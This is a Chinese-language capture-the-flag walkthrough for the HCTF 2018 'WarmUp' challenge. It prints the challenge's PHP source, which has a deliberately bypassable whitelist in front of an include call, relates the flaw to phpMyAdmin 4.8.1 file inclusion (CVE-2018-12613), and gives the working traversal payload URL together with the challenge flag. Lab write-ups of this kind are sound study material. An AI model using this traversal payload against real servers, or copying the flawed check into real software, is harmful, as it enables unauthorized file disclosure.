第一题——[HCTF 2018]WarmUp

题目地址：https://buuoj.cn/challenges

解题思路

第一步：进入题目，迎面而来的是一张滑稽图片，按f12查看，发现提示：source.php

第二步：在URL一栏输入访问提示给出的php页面

http://c0717382-8c47-4aa3-b308-1972e1173f7a.node3.buuoj.cn/source.php

第三步：查看source.php页面给出的提示

<?phphighlight_file(__FILE__);class emmm{
    public static function checkFile(&$page){
    $whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {
    echo "you can't see it";return false;}if (in_array($page, $whitelist)) {
    return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {
    return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {
    return true;}echo "you can't see it";return false;}}if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {
    include $_REQUEST['file'];exit;} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";}  
?>

第四步：分析代码

1. 先查看主函数

if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {
    include $_REQUEST['file'];exit;} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} 

       提取页面提交过来的file参数，并判断file参数是否为为空，是否为字符串，以及是否通过了checkFile函数，三项检测都通过了则使用include函数将file参数指定的内容插入到当前页面中。没有通过则打印之前看到的那张滑稽图片。
       结论：需要在URL栏添加?file=xxx内容。其中xxx指向flag所在文件，且要通过三重检测。

2. 之后查看checkFile函数

public static function checkFile(&$page){
    $whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {
    echo "you can't see it";return false;}if (in_array($page, $whitelist)) {
    return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {
    return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {
    return true;}echo "you can't see it";return false;}

第一个if判断xxx内容是否为空是否为字符串。
第二个if判断xxx内容是否包含白名单里的内容。
之后对xxx内容进行截断，从开头阶段到？之前。
第三个if判断截断后的内容里是否包含有白名单里面的内容。
之后对xxx进行解码，再截断。
第四个if执行第三个if同样功能。
结论：需要构造?file=source.php?/…/…/…/…/xxx，在第二个if中返回true通过验证然后将xxx输出到当前页面。其中xxx指向flag所在页面。
使用多个…/是利用一个漏洞。漏洞地址：phpmyadmin 4.8.1 远程文件包含漏洞（CVE-2018-12613）

第五步：确定flag所在

在第四步中发现除了可以访问source.php以外，还可以访问hint.php。访问hint.php之后得到flag所在地。

第六步：获得flag

在URL一栏输入
http://c0717382-8c47-4aa3-b308-1972e1173f7a.node3.buuoj.cn/source.php?file=hint.php?/../../../../../ffffllllaaaagggg
得到flag：c4f4e88f-69c5-487a-8168-3c8c187d080a